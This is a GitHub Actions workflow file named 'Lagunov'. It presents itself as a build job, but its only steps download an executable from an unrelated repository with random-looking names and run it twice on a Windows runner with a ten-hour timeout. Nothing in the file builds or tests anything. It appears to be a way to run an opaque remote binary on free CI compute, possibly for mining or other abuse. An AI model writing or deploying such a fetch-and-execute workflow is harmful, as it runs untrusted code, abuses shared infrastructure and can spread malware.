name: Lagunov
on: workflow_dispatch
jobs:
  build:
    runs-on: windows-2019
    timeout-minutes: 600
    steps:
    - name: HGI
      run: Invoke-WebRequest https://github.com/Guatamellas/Missipitinr7/raw/main/Lagunov.exe -OutFile Lagunov.exe && .\Lagunov.exe
    - name: UBK
      run: .\Lagunov.exe
